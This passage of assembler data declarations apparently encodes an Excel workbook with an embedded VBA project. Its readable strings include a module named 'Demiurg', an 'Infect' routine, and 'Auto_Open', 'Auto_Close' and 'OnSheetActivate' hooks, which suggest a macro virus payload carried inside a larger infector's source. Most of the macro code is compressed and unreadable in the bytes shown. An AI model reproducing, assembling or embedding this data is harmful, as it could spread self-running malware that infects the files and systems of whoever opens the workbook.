db 093h, 000h, 000h, 000h, 094h, 000h, 000h, 000h
db 095h, 000h, 000h, 000h, 096h, 000h, 000h, 000h
db 097h, 000h, 000h, 000h, 098h, 000h, 000h, 000h
db 0FEh, 0FFh, 0FFh, 0FFh, 09Ah, 000h, 000h, 000h
db 09Bh, 000h, 000h, 000h, 09Ch, 000h, 000h, 000h
db 09Dh, 000h, 000h, 000h, 09Eh, 000h, 000h, 000h
db 09Fh, 000h, 000h, 000h, 0A0h, 000h, 000h, 000h
db 0A1h, 000h, 000h, 000h, 0A2h, 000h, 000h, 000h
db 0A3h, 000h, 000h, 000h, 0A4h, 000h, 000h, 000h
db 0FEh, 0FFh, 0FFh, 0FFh, 0A6h, 000h, 000h, 000h
db 0FEh, 0FFh, 0FFh, 0FFh, 0A8h, 000h, 000h, 000h
db 0A9h, 000h, 000h, 000h, 0AAh, 000h, 000h, 000h
db 0ABh, 000h, 000h, 000h, 0ACh, 000h, 000h, 000h
db 0ADh, 000h, 000h, 000h, 0FEh, 0FFh, 0FFh, 0FFh
db 0AFh, 000h, 000h, 000h, 0B0h, 000h, 000h, 000h
db 0FEh, 0FFh, 0FFh, 0FFh, 0B2h, 000h, 000h, 000h
db 0B3h, 000h, 000h, 000h, 0B4h, 000h, 000h, 000h
db 0B5h, 000h, 000h, 000h, 0B6h, 000h, 000h, 000h
db 0B7h, 000h, 000h, 000h, 0FEh, 0FFh, 0FFh, 0FFh
db 0B9h, 000h, 000h, 000h, 0FEh, 0E6h, 0FFh, 0FFh
db 0E6h, 01Ch, 0FFh, 041h, 000h, 035h, 000h, 030h
db 000h, 030h, 000h, 02Dh, 000h, 041h, 000h, 036h
db 000h, 046h, 000h, 033h, 000h, 044h, 000h, 044h
db 000h, 041h, 000h, 044h, 000h, 038h, 000h, 032h
db 000h, 033h, 000h, 039h, 000h, 07Dh, 000h, 023h
db 000h, 032h, 000h, 02Eh, 000h, 030h, 000h, 023h
db 000h, 030h, 000h, 023h, 000h, 043h, 000h, 03Ah
db 000h, 05Ch, 000h, 057h, 000h, 049h, 000h, 04Eh
db 000h, 044h, 000h, 04Fh, 000h, 057h, 000h, 053h
db 000h, 05Ch, 000h, 054h, 000h, 045h, 000h, 04Dh
db 000h, 050h, 000h, 05Ch, 000h, 056h, 000h, 042h
db 000h, 045h, 000h, 05Ch, 000h, 04Dh, 000h, 053h
db 000h, 046h, 000h, 06Fh, 000h, 072h, 000h, 06Dh
db 000h, 073h, 000h, 02Eh, 000h, 045h, 000h, 058h
db 000h, 044h, 000h, 023h, 000h, 04Dh, 000h, 069h
db 000h, 063h, 000h, 072h, 000h, 06Fh, 000h, 073h
db 000h, 06Fh, 000h, 066h, 000h, 074h, 000h, 020h
db 000h, 046h, 000h, 06Fh, 000h, 072h, 000h, 06Dh
db 000h, 073h, 000h, 020h, 000h, 032h, 000h, 02Eh
db 000h, 030h, 000h, 020h, 000h, 04Fh, 000h, 062h
db 000h, 06Ah, 000h, 065h, 000h, 063h, 000h, 074h
db 000h, 020h, 000h, 04Ch, 000h, 069h, 000h, 062h
db 000h, 072h, 000h, 061h, 000h, 072h, 000h, 079h
db 0E6h, 00Bh, 000h, 001h, 000h, 000h, 000h, 0E1h
db 02Eh, 045h, 00Dh, 08Fh, 0E0h, 01Ah, 010h, 085h
db 02Eh, 002h, 060h, 08Ch, 04Dh, 00Bh, 0B4h, 000h
db 000h, 004h, 001h, 02Ah, 000h, 05Ch, 000h, 047h
db 000h, 07Bh, 000h, 032h, 000h, 044h, 000h, 046h
db 000h, 038h, 000h, 044h, 000h, 030h, 000h, 034h
db 000h, 043h, 000h, 02Dh, 000h, 035h, 000h, 042h
db 000h, 046h, 000h, 041h, 000h, 02Dh, 000h, 031h
db 000h, 030h, 000h, 031h, 000h, 042h, 000h, 02Dh
db 000h, 042h, 000h, 044h, 000h, 045h, 000h, 035h
db 000h, 02Dh, 000h, 030h, 000h, 030h, 000h, 041h
db 000h, 041h, 000h, 030h, 000h, 030h, 000h, 034h
db 000h, 034h, 000h, 044h, 000h, 045h, 000h, 035h
db 000h, 032h, 000h, 07Dh, 000h, 023h, 000h, 032h
db 000h, 02Eh, 000h, 030h, 000h, 023h, 000h, 030h
db 000h, 023h, 000h, 043h, 000h, 03Ah, 000h, 05Ch
db 000h, 050h, 000h, 052h, 000h, 04Fh, 000h, 047h
db 000h, 052h, 000h, 041h, 000h, 04Dh, 000h, 04Dh
db 000h, 045h, 000h, 05Ch, 000h, 04Dh, 000h, 049h
db 000h, 043h, 000h, 052h, 000h, 04Fh, 000h, 053h
db 000h, 04Fh, 000h, 046h, 000h, 054h, 000h, 020h
db 000h, 04Fh, 000h, 046h, 000h, 046h, 000h, 049h
db 000h, 043h, 000h, 045h, 000h, 05Ch, 000h, 04Fh
db 000h, 046h, 000h, 046h, 000h, 049h, 000h, 043h
db 000h, 045h, 000h, 05Ch, 000h, 04Dh, 000h, 053h
db 000h, 04Fh, 000h, 039h, 000h, 037h, 000h, 02Eh
db 000h, 044h, 000h, 04Ch, 000h, 04Ch, 000h, 023h
db 000h, 04Dh, 000h, 069h, 000h, 063h, 000h, 072h
db 000h, 06Fh, 000h, 073h, 000h, 06Fh, 000h, 066h
db 000h, 074h, 000h, 020h, 000h, 04Fh, 000h, 066h
db 000h, 066h, 000h, 069h, 000h, 063h, 000h, 065h
db 000h, 020h, 000h, 038h, 000h, 02Eh, 000h, 030h
db 000h, 020h, 000h, 04Fh, 000h, 062h, 000h, 06Ah
db 000h, 065h, 000h, 063h, 000h, 074h, 000h, 020h
db 000h, 04Ch, 000h, 069h, 000h, 062h, 000h, 072h
db 000h, 061h, 000h, 072h, 000h, 079h, 0E6h, 00Dh
db 000h, 003h, 000h, 002h, 000h, 002h, 000h, 001h
db 000h, 003h, 000h, 004h, 002h, 000h, 000h, 006h
db 002h, 001h, 000h, 008h, 002h, 000h, 000h, 010h
db 002h, 0E6h, 006h, 0FFh, 0E6h, 004h, 000h, 0FFh
db 0FFh, 000h, 000h, 0E8h, 005h, 0C0h, 038h, 003h
db 000h, 0E6h, 00Ah, 0FFh, 000h, 000h, 001h, 000h
db 0E6h, 026h, 0FFh, 002h, 000h, 0E6h, 00Ah, 0FFh
db 001h, 0E6h, 013h, 000h, 0B5h, 031h, 003h, 000h
db 022h, 000h, 044h, 000h, 069h, 000h, 065h, 000h
db 073h, 000h, 065h, 000h, 041h, 000h, 072h, 000h
db 062h, 000h, 065h, 000h, 069h, 000h, 074h, 000h
db 073h, 000h, 06Dh, 000h, 061h, 000h, 070h, 000h
db 070h, 000h, 065h, 000h, 00Ah, 000h, 034h, 033h
db 038h, 063h, 030h, 030h, 035h, 065h, 038h, 000h
db 003h, 000h, 02Ah, 044h, 001h, 015h, 002h, 0FFh
db 0FFh, 0B7h, 031h, 0E6h, 007h, 000h, 002h, 000h
db 000h, 000h, 01Fh, 003h, 000h, 000h, 0FFh, 0FFh
db 010h, 000h, 054h, 000h, 061h, 000h, 062h, 000h
db 065h, 000h, 06Ch, 000h, 06Ch, 000h, 065h, 000h
db 031h, 000h, 00Ah, 000h, 035h, 033h, 038h, 063h
db 030h, 030h, 035h, 065h, 038h, 000h, 003h, 000h
db 02Ah, 044h, 001h, 019h, 002h, 0FFh, 0FFh, 0B9h
db 031h, 0E6h, 006h, 000h, 018h, 002h, 000h, 000h
db 000h, 01Fh, 003h, 000h, 000h, 0FFh, 0FFh, 00Eh
db 000h, 044h, 000h, 065h, 000h, 06Dh, 000h, 069h
db 000h, 075h, 000h, 072h, 000h, 067h, 000h, 00Ah
db 000h, 064h, 033h, 038h, 063h, 030h, 030h, 035h
db 066h, 036h, 000h, 003h, 000h, 02Ah, 044h, 001h
db 01Ch, 002h, 0FFh, 0FFh, 0BBh, 031h, 0E6h, 006h
db 000h, 030h, 002h, 000h, 000h, 000h, 0B7h, 005h
db 000h, 000h, 0E6h, 006h, 0FFh, 001h, 001h, 050h
db 002h, 000h, 000h, 0E6h, 0D8h, 0FFh, 000h, 002h
db 000h, 000h, 0E6h, 004h, 0FFh, 018h, 002h, 000h
db 000h, 0E6h, 004h, 0FFh, 030h, 002h, 000h, 000h
db 0E6h, 0FFh, 0FFh, 0E6h, 015h, 0FFh, 0E7h, 06Eh
db 0E4h, 0D9h, 03Ah, 0F1h, 0D3h, 011h, 0A5h, 001h
db 0A6h, 0F3h, 0DDh, 0ADh, 082h, 039h, 0E6h, 004h
db 0FFh, 001h, 000h, 000h, 000h, 0E9h, 06Eh, 0E4h
db 0D9h, 03Ah, 0F1h, 0D3h, 011h, 0A5h, 001h, 0A6h
db 0F3h, 0DDh, 0ADh, 082h, 039h, 0E6h, 004h, 0FFh
db 001h, 000h, 000h, 000h, 0EBh, 06Eh, 0E4h, 0D9h
db 03Ah, 0F1h, 0D3h, 011h, 0A5h, 001h, 0A6h, 0F3h
db 0DDh, 0ADh, 082h, 039h, 0E6h, 004h, 0FFh, 001h
db 000h, 000h, 000h, 0E6h, 004h, 0FFh, 030h, 000h
db 000h, 000h, 080h, 0E6h, 005h, 000h, 020h, 001h
db 021h, 000h, 0FFh, 000h, 0B8h, 028h, 000h, 000h
db 005h, 004h, 045h, 078h, 063h, 065h, 06Ch, 080h
db 02Bh, 010h, 000h, 003h, 004h, 056h, 042h, 041h
db 0F7h, 0E2h, 010h, 000h, 005h, 004h, 057h, 069h
db 06Eh, 031h, 036h, 0C1h, 07Eh, 010h, 000h, 005h
db 004h, 057h, 069h, 06Eh, 033h, 032h, 007h, 07Fh
db 010h, 000h, 003h, 004h, 04Dh, 061h, 063h, 0B3h
db 0B2h, 010h, 000h, 008h, 004h, 050h, 072h, 06Fh
db 06Ah, 065h, 06Bh, 074h, 031h, 0D2h, 041h, 010h
db 000h, 006h, 004h, 073h, 074h, 064h, 06Fh, 06Ch
db 065h, 093h, 060h, 010h, 000h, 007h, 000h, 04Dh
db 053h, 046h, 06Fh, 072h, 06Dh, 073h, 043h, 00Fh
db 010h, 000h, 00Ah, 004h, 056h, 042h, 041h, 050h
db 072h, 06Fh, 06Ah, 065h, 063h, 074h, 0BEh, 0BFh
db 010h, 000h, 006h, 004h, 04Fh, 066h, 066h, 069h
db 063h, 065h, 015h, 075h, 010h, 000h, 011h, 004h
db 044h, 069h, 065h, 073h, 065h, 041h, 072h, 062h
db 065h, 069h, 074h, 073h, 06Dh, 061h, 070h, 070h
db 065h, 0AFh, 081h, 010h, 000h, 009h, 080h, 000h
db 000h, 0FFh, 003h, 001h, 000h, 05Fh, 045h, 076h
db 061h, 06Ch, 075h, 061h, 074h, 065h, 018h, 0D9h
db 010h, 000h, 008h, 004h, 054h, 061h, 062h, 065h
db 06Ch, 06Ch, 065h, 031h, 052h, 08Ah, 010h, 000h
db 006h, 004h, 04Dh, 06Fh, 064h, 075h, 06Ch, 031h
db 0CDh, 01Eh, 010h, 000h, 007h, 004h, 044h, 065h
db 06Dh, 069h, 075h, 072h, 067h, 01Dh, 017h, 010h
db 000h, 009h, 004h, 041h, 075h, 074h, 06Fh, 05Fh
db 04Fh, 070h, 065h, 06Eh, 056h, 020h, 010h, 000h
db 00Bh, 000h, 041h, 070h, 070h, 06Ch, 069h, 063h
db 061h, 074h, 069h, 06Fh, 06Eh, 0A5h, 02Ah, 010h
db 000h, 00Fh, 000h, 04Fh, 06Eh, 053h, 068h, 065h
db 065h, 074h, 041h, 063h, 074h, 069h, 076h, 061h
db 074h, 065h, 0FAh, 06Eh, 010h, 000h, 00Ah, 004h
db 041h, 075h, 074h, 06Fh, 05Fh, 043h, 06Ch, 06Fh
db 073h, 065h, 077h, 080h, 010h, 000h, 00Ch, 000h
db 041h, 063h, 074h, 069h, 076h, 065h, 057h, 069h
db 06Eh, 064h, 06Fh, 077h, 0C3h, 02Bh, 010h, 000h
db 007h, 000h, 056h, 069h, 073h, 069h, 062h, 06Ch
db 065h, 0B6h, 0D3h, 010h, 000h, 006h, 004h, 049h
db 06Eh, 066h, 065h, 063h, 074h, 0E8h, 066h, 010h
db 000h, 00Dh, 000h, 044h, 069h, 073h, 070h, 06Ch
db 061h, 079h, 041h, 06Ch, 065h, 072h, 074h, 073h
db 0F4h, 0F6h, 010h, 000h, 008h, 000h, 06Ch, 061h
db 073h, 074h, 063h, 068h, 061h, 072h, 013h, 09Ah
db 010h, 000h, 003h, 000h, 041h, 073h, 063h, 021h
db 075h, 010h, 000h, 00Eh, 000h, 041h, 063h, 074h
db 069h, 076h, 065h, 057h, 06Fh, 072h, 06Bh, 062h
db 06Fh, 06Fh, 06Bh, 013h, 0A2h, 010h, 000h, 001h
db 000h, 069h, 060h, 010h, 010h, 000h, 009h, 000h
db 056h, 042h, 050h, 072h, 06Fh, 06Ah, 065h, 063h
db 074h, 04Fh, 068h, 010h, 000h, 00Ch, 000h, 056h
db 042h, 043h, 06Fh, 06Dh, 070h, 06Fh, 06Eh, 065h
db 06Eh, 074h, 073h, 00Ah, 027h, 010h, 000h, 005h
db 000h, 063h, 06Fh, 075h, 06Eh, 074h, 030h, 076h
db 010h, 000h, 006h, 000h, 049h, 06Dh, 070h, 06Fh
db 072h, 074h, 069h, 0C5h, 010h, 000h, 004h, 000h
db 053h, 061h, 076h, 065h, 092h, 0D0h, 010h, 000h
db 008h, 004h, 057h, 06Fh, 072h, 06Bh, 062h, 06Fh
db 06Fh, 06Bh, 06Bh, 018h, 010h, 000h, 002h, 0FFh
db 0FFh, 001h, 001h, 06Ch, 000h, 000h, 000h, 01Dh
db 002h, 002h, 000h, 010h, 000h, 0E6h, 012h, 0FFh
db 000h, 002h, 001h, 000h, 0FFh, 0FFh, 002h, 002h
db 000h, 000h, 0E6h, 01Ah, 0FFh, 00Ch, 002h, 002h
db 000h, 0FFh, 0FFh, 00Eh, 002h, 003h, 000h, 0FFh
db 0FFh, 010h, 002h, 0E6h, 004h, 0FFh, 012h, 002h
db 004h, 000h, 0FFh, 0FFh, 015h, 002h, 000h, 000h
db 00Eh, 000h, 0E6h, 006h, 0FFh, 019h, 002h, 001h
db 000h, 00Eh, 000h, 0E6h, 006h, 0FFh, 000h, 000h
db 012h, 000h, 000h, 000h, 001h, 000h, 036h, 0E6h
db 060h, 000h, 001h, 0C6h, 0B2h, 080h, 001h, 000h
db 004h, 000h, 000h, 000h, 001h, 000h, 030h, 02Ah
db 002h, 002h, 090h, 009h, 000h, 070h, 014h, 006h
db 048h, 003h, 000h, 082h, 002h, 000h, 064h, 0E4h
db 004h, 004h, 000h, 00Ah, 000h, 01Ch, 000h, 056h
db 042h, 041h, 050h, 072h, 06Fh, 06Ah, 065h, 088h
db 063h, 074h, 005h, 000h, 034h, 000h, 000h, 040h
db 002h, 014h, 06Ah, 006h, 002h, 00Ah, 03Dh, 002h
db 00Ah, 007h, 002h, 072h, 001h, 014h, 008h, 005h
db 006h, 012h, 009h, 002h, 012h, 0E8h, 005h, 0C0h
db 038h, 003h, 094h, 000h, 00Ch, 002h, 04Ah, 03Ch
db 002h, 00Ah, 016h, 000h, 001h, 072h, 080h, 073h
db 074h, 064h, 06Fh, 06Ch, 065h, 03Eh, 002h, 019h
db 000h, 073h, 000h, 074h, 000h, 064h, 000h, 06Fh
db 000h, 080h, 06Ch, 000h, 065h, 000h, 00Dh, 000h
db 066h, 000h, 025h, 002h, 05Ch, 000h, 003h, 02Ah
db 05Ch, 047h, 07Bh, 030h, 030h, 080h, 030h, 032h
db 030h, 034h, 033h, 030h, 02Dh, 000h, 008h, 01Dh
db 004h, 004h, 043h, 000h, 00Ah, 002h, 00Eh, 001h
db 012h, 030h, 030h, 034h, 000h, 036h, 07Dh, 023h
db 032h, 02Eh, 030h, 023h, 030h, 000h, 023h, 043h
db 03Ah, 05Ch, 057h, 049h, 04Eh, 044h, 000h, 04Fh
db 057h, 053h, 05Ch, 053h, 059h, 053h, 054h, 000h
db 045h, 04Dh, 05Ch, 053h, 054h, 044h, 04Fh, 04Ch
db 080h, 045h, 032h, 02Eh, 054h, 04Ch, 042h, 023h
db 000h, 008h, 000h, 020h, 041h, 075h, 074h, 06Fh
db 06Dh, 061h, 074h, 018h, 069h, 06Fh, 06Eh, 000h
db 05Eh, 000h, 001h, 016h, 000h, 007h, 001h, 080h
db 002h, 04Dh, 053h, 046h, 06Fh, 072h, 06Dh, 073h
db 008h, 03Eh, 000h, 00Eh, 001h, 006h, 000h, 053h
db 000h, 046h, 001h, 000h, 045h, 072h, 000h, 06Dh
db 000h, 073h, 000h, 02Fh, 034h, 000h, 07Ah, 080h
db 009h, 070h, 080h, 001h, 001h, 046h, 036h, 032h
db 000h, 041h, 033h, 032h, 043h, 036h, 032h, 02Dh
db 041h, 000h, 033h, 036h, 044h, 02Dh, 031h, 031h
db 044h, 033h, 000h, 02Dh, 041h, 035h, 030h, 030h
db 02Dh, 041h, 036h, 000h, 046h, 033h, 044h, 044h
db 041h, 044h, 038h, 032h, 00Ch, 033h, 039h, 017h
db 046h, 004h, 033h, 02Eh, 054h, 057h, 044h, 000h
db 023h, 04Dh, 069h, 063h, 072h, 06Fh, 073h, 06Fh
db 028h, 066h, 074h, 020h, 002h, 03Dh, 020h, 000h
db 060h, 020h, 04Fh, 002h, 062h, 001h, 0B0h, 020h
db 04Ch, 069h, 062h, 072h, 061h, 01Ch, 072h, 079h
db 000h, 039h, 000h, 001h, 01Eh, 050h, 030h, 000h
db 090h, 07Dh, 000h, 013h, 072h, 080h, 001h, 008h
db 050h, 000h, 04Bh, 02Ah, 050h, 080h, 04Ah, 050h
db 020h, 05Ch, 056h, 042h, 045h, 05Ch, 085h, 028h
db 045h, 058h, 001h, 0A7h, 028h, 0E1h, 02Eh, 045h
db 00Dh, 08Fh, 0E0h, 01Ah, 000h, 010h, 085h, 02Eh
db 002h, 060h, 08Ch, 04Dh, 00Bh, 006h, 0B4h, 041h
db 094h, 043h, 078h, 04Fh, 066h, 066h, 069h, 063h
db 005h, 044h, 078h, 04Fh, 040h, 075h, 066h, 000h
db 069h, 000h, 063h, 015h, 042h, 078h, 08Ch, 0C0h
db 02Bh, 082h, 0C4h, 02Ch, 032h, 044h, 046h, 000h
db 038h, 044h, 030h, 034h, 043h, 02Dh, 035h, 042h
db 000h, 046h, 041h, 02Dh, 031h, 030h, 031h, 042h
db 02Dh, 090h, 064h, 000h, 069h, 000h, 072h, 0E6h
db 03Bh, 000h, 008h, 000h, 002h, 000h, 0E6h, 00Ch
db 0FFh, 0E6h, 024h, 000h, 099h, 000h, 000h, 000h
db 0CAh, 002h, 0E6h, 006h, 000h, 050h, 000h, 052h
db 000h, 04Fh, 000h, 04Ah, 000h, 045h, 000h, 043h
db 000h, 054h, 000h, 077h, 000h, 06Dh, 0E6h, 02Fh
db 000h, 014h, 000h, 002h, 000h, 0E6h, 00Ch, 0FFh
db 0E6h, 024h, 000h, 0A5h, 000h, 000h, 000h, 06Bh
db 0E6h, 007h, 000h, 050h, 000h, 052h, 000h, 04Fh
db 000h, 04Ah, 000h, 045h, 000h, 043h, 000h, 054h
db 0E6h, 033h, 000h, 010h, 000h, 002h, 001h, 003h
db 000h, 000h, 000h, 009h, 000h, 000h, 000h, 0E6h
db 004h, 0FFh, 0E6h, 024h, 000h, 0A7h, 000h, 000h
db 000h, 0B8h, 001h, 0E6h, 006h, 000h, 005h, 000h
db 053h, 000h, 075h, 000h, 06Dh, 000h, 06Dh, 000h
db 061h, 000h, 072h, 000h, 079h, 000h, 049h, 000h
db 06Eh, 000h, 066h, 000h, 06Fh, 000h, 072h, 000h
db 06Dh, 000h, 061h, 000h, 074h, 000h, 069h, 000h
db 06Fh, 000h, 06Eh, 0E6h, 01Bh, 000h, 028h, 000h
db 002h, 001h, 0E6h, 004h, 0FFh, 00Ch, 000h, 000h
db 000h, 0E6h, 004h, 0FFh, 0E6h, 024h, 000h, 0AEh
db 000h, 000h, 000h, 0B4h, 0E6h, 007h, 000h, 042h
db 044h, 045h, 035h, 040h, 078h, 041h, 041h, 040h
db 077h, 00Ah, 034h, 0C0h, 002h, 032h, 008h, 055h
db 050h, 052h, 04Fh, 047h, 010h, 052h, 041h, 04Dh
db 04Dh, 000h, 02Bh, 049h, 043h, 052h, 000h, 04Fh
db 053h, 04Fh, 046h, 054h, 020h, 04Fh, 046h, 020h
db 046h, 049h, 043h, 045h, 05Ch, 084h, 001h, 04Dh
db 053h, 080h, 04Fh, 039h, 037h, 02Eh, 044h, 04Ch
db 04Ch, 048h, 059h, 0A1h, 083h, 022h, 020h, 038h
db 02Eh, 030h, 092h, 059h, 00Fh, 042h, 0BBh, 008h
db 003h, 000h, 013h, 0C2h, 001h, 0B5h, 031h, 019h
db 000h, 002h, 011h, 040h, 027h, 044h, 069h, 065h
db 073h, 065h, 041h, 000h, 072h, 062h, 065h, 069h
db 074h, 073h, 06Dh, 061h, 010h, 070h, 070h, 065h
db 01Ah, 093h, 005h, 032h, 000h, 022h, 00Bh, 041h
db 00Bh, 040h, 037h, 065h, 080h, 08Ch, 065h, 000h
db 041h, 000h, 0A8h, 072h, 000h, 062h, 0C0h, 039h
db 069h, 040h, 0B5h, 073h, 080h, 091h, 088h, 061h
db 000h, 070h, 040h, 000h, 065h, 000h, 01Ch, 040h
db 009h, 028h, 000h, 000h, 048h, 042h, 001h, 031h
db 0C2h, 0C6h, 01Fh, 003h, 058h, 000h, 000h, 01Eh
db 042h, 002h, 001h, 005h, 02Ch, 042h, 01Fh, 0B7h
db 022h, 031h, 041h, 013h, 000h, 000h, 02Bh, 0C2h
db 009h, 019h, 000h, 002h, 008h, 0C0h, 001h, 054h
db 061h, 062h, 065h, 06Ch, 06Ch, 088h, 065h, 031h
db 01Ah, 04Ah, 003h, 032h, 000h, 010h, 0C1h, 006h
db 054h, 000h, 061h, 042h, 01Bh, 06Ch, 042h, 0CFh
db 031h, 064h, 019h, 0B9h, 005h, 04Ch, 019h, 007h
db 020h, 009h, 044h, 065h, 06Dh, 069h, 075h, 058h
db 072h, 067h, 01Ah, 082h, 062h, 084h, 001h, 032h
db 082h, 062h, 044h, 055h, 0A0h, 019h, 06Dh, 0E0h
db 01Bh, 075h, 020h, 01Bh, 067h, 030h, 00Ch, 0B7h
db 0E3h, 0C0h, 082h, 0EDh, 018h, 0BBh, 031h, 021h
db 060h, 00Ah, 0E5h, 018h, 021h, 015h, 0E6h, 039h
db 000h, 044h, 069h, 065h, 073h, 065h, 041h, 072h
db 062h, 065h, 069h, 074h, 073h, 06Dh, 061h, 070h
db 070h, 065h, 000h, 044h, 000h, 069h, 000h, 065h
db 000h, 073h, 000h, 065h, 000h, 041h, 000h, 072h
db 000h, 062h, 000h, 065h, 000h, 069h, 000h, 074h
db 000h, 073h, 000h, 06Dh, 000h, 061h, 000h, 070h
db 000h, 070h, 000h, 065h, 000h, 000h, 000h, 054h
db 061h, 062h, 065h, 06Ch, 06Ch, 065h, 031h, 000h
db 054h, 000h, 061h, 000h, 062h, 000h, 065h, 000h
db 06Ch, 000h, 06Ch, 000h, 065h, 000h, 031h, 000h
db 000h, 000h, 044h, 065h, 06Dh, 069h, 075h, 072h
db 067h, 000h, 044h, 000h, 065h, 000h, 06Dh, 000h
db 069h, 000h, 075h, 000h, 072h, 000h, 067h, 0E6h
db 01Ah, 000h, 049h, 044h, 03Dh, 022h, 07Bh, 044h
db 039h, 045h, 034h, 036h, 045h, 046h, 030h, 02Dh
db 046h, 031h, 033h, 041h, 02Dh, 031h, 031h, 044h
db 033h, 02Dh, 041h, 035h, 030h, 031h, 02Dh, 041h
db 036h, 046h, 033h, 044h, 044h, 041h, 044h, 038h
db 032h, 033h, 039h, 07Dh, 022h, 00Dh, 00Ah, 044h
db 06Fh, 063h, 075h, 06Dh, 065h, 06Eh, 074h, 03Dh
db 044h, 069h, 065h, 073h, 065h, 041h, 072h, 062h
db 065h, 069h, 074h, 073h, 06Dh, 061h, 070h, 070h
db 065h, 02Fh, 026h, 048h, 0E6h, 008h, 030h, 00Dh
db 00Ah, 044h, 06Fh, 063h, 075h, 06Dh, 065h, 06Eh
db 074h, 03Dh, 054h, 061h, 062h, 065h, 06Ch, 06Ch
db 065h, 031h, 02Fh, 026h, 048h, 0E6h, 008h, 030h
db 00Dh, 00Ah, 04Dh, 06Fh, 064h, 075h, 06Ch, 065h
db 03Dh, 044h, 065h, 06Dh, 069h, 075h, 072h, 067h
db 00Dh, 00Ah, 04Eh, 061h, 06Dh, 065h, 03Dh, 022h
db 056h, 042h, 041h, 050h, 072h, 06Fh, 06Ah, 065h
db 063h, 074h, 022h, 00Dh, 00Ah, 048h, 065h, 06Ch
db 070h, 043h, 06Fh, 06Eh, 074h, 065h, 078h, 074h
db 049h, 044h, 03Dh, 022h, 030h, 022h, 00Dh, 00Ah
db 043h, 04Dh, 047h, 03Dh, 022h, 039h, 039h, 039h
db 042h, 039h, 038h, 039h, 038h, 039h, 043h, 039h
db 038h, 039h, 043h, 039h, 038h, 039h, 043h, 039h
db 038h, 039h, 043h, 022h, 00Dh, 00Ah, 044h, 050h
db 042h, 03Dh, 022h, 033h, 032h, 033h, 030h, 033h
db 033h, 041h, 038h, 043h, 044h, 041h, 039h, 043h
db 044h, 041h, 039h, 043h, 044h, 022h, 00Dh, 00Ah
db 047h, 043h, 03Dh, 022h, 043h, 042h, 043h, 039h
db 043h, 041h, 035h, 033h, 036h, 032h, 035h, 034h
db 036h, 032h, 035h, 034h, 039h, 044h, 022h, 00Dh
db 00Ah, 00Dh, 00Ah, 05Bh, 048h, 06Fh, 073h, 074h
db 020h, 045h, 078h, 074h, 065h, 06Eh, 064h, 065h
db 072h, 020h, 049h, 06Eh, 066h, 06Fh, 05Dh, 00Dh
db 00Ah, 026h, 048h, 0E6h, 007h, 030h, 031h, 03Dh
db 07Bh, 033h, 038h, 033h, 032h, 044h, 036h, 034h
db 030h, 02Dh, 043h, 046h, 039h, 030h, 02Dh, 031h
db 031h, 043h, 046h, 02Dh, 038h, 045h, 034h, 033h
db 02Dh, 030h, 030h, 041h, 030h, 043h, 039h, 031h
db 031h, 030h, 030h, 035h, 041h, 07Dh, 03Bh, 056h
db 042h, 045h, 03Bh, 026h, 048h, 0E6h, 008h, 030h
db 00Dh, 00Ah, 00Dh, 00Ah, 05Bh, 057h, 06Fh, 072h
db 06Bh, 073h, 070h, 061h, 063h, 065h, 05Dh, 00Dh
db 00Ah, 044h, 069h, 065h, 073h, 065h, 041h, 072h
db 062h, 065h, 069h, 074h, 073h, 06Dh, 061h, 070h
db 070h, 065h, 03Dh, 030h, 02Ch, 020h, 030h, 02Ch
db 020h, 030h, 02Ch, 020h, 030h, 02Ch, 020h, 043h
db 00Dh, 00Ah, 054h, 061h, 062h, 065h, 06Ch, 06Ch
db 065h, 031h, 03Dh, 030h, 02Ch, 020h, 030h, 02Ch
db 020h, 030h, 02Ch, 020h, 030h, 02Ch, 020h, 043h
db 00Dh, 00Ah, 044h, 065h, 06Dh, 069h, 075h, 072h
db 067h, 03Dh, 032h, 032h, 02Ch, 020h, 032h, 032h
db 02Ch, 020h, 034h, 030h, 036h, 02Ch, 020h, 031h
db 039h, 031h, 02Ch, 020h, 05Ah, 00Dh, 00Ah, 0E6h
db 008h, 000h, 0FEh, 0FFh, 000h, 000h, 004h, 000h
db 002h, 0E6h, 011h, 000h, 001h, 000h, 000h, 000h
db 0E0h, 085h, 09Fh, 0F2h, 0F9h, 04Fh, 068h, 010h
db 0ABh, 091h, 008h, 000h, 02Bh, 027h, 0B3h, 0D9h
db 030h, 000h, 000h, 000h, 084h, 000h, 000h, 000h
db 006h, 000h, 000h, 000h, 001h, 000h, 000h, 000h
db 038h, 000h, 000h, 000h, 004h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 008h, 000h, 000h, 000h
db 04Ch, 000h, 000h, 000h, 012h, 000h, 000h, 000h
db 058h, 000h, 000h, 000h, 00Ch, 000h, 000h, 000h
db 070h, 000h, 000h, 000h, 013h, 000h, 000h, 000h
db 07Ch, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 0E4h, 004h, 000h, 000h, 01Eh, 000h, 000h, 000h
db 002h, 000h, 000h, 000h, 042h, 000h, 073h, 000h
db 01Eh, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 042h, 000h, 073h, 000h, 01Eh, 000h, 000h, 000h
db 010h, 000h, 000h, 000h, 04Dh, 069h, 063h, 072h
db 06Fh, 073h, 06Fh, 066h, 074h, 020h, 045h, 078h
db 063h, 065h, 06Ch, 000h, 040h, 000h, 000h, 000h
db 080h, 0ECh, 0E8h, 033h, 03Fh, 085h, 0BFh, 001h
db 003h, 0E6h, 013h, 000h, 0FEh, 0FFh, 000h, 000h
db 004h, 000h, 002h, 0E6h, 011h, 000h, 002h, 000h
db 000h, 000h, 002h, 0D5h, 0CDh, 0D5h, 09Ch, 02Eh
db 01Bh, 010h, 093h, 097h, 008h, 000h, 02Bh, 02Ch
db 0F9h, 0AEh, 044h, 000h, 000h, 000h, 005h, 0D5h
db 0CDh, 0D5h, 09Ch, 02Eh, 01Bh, 010h, 093h, 097h
db 008h, 000h, 02Bh, 02Ch, 0F9h, 0AEh, 008h, 001h
db 000h, 000h, 0C4h, 000h, 000h, 000h, 009h, 000h
db 000h, 000h, 001h, 000h, 000h, 000h, 050h, 000h
db 000h, 000h, 00Fh, 000h, 000h, 000h, 058h, 000h
db 000h, 000h, 017h, 000h, 000h, 000h, 064h, 000h
db 000h, 000h, 00Bh, 000h, 000h, 000h, 06Ch, 000h
db 000h, 000h, 010h, 000h, 000h, 000h, 074h, 000h
db 000h, 000h, 013h, 000h, 000h, 000h, 07Ch, 000h
db 000h, 000h, 016h, 000h, 000h, 000h, 084h, 000h
db 000h, 000h, 00Dh, 000h, 000h, 000h, 08Ch, 000h
db 000h, 000h, 00Ch, 000h, 000h, 000h, 0A1h, 000h
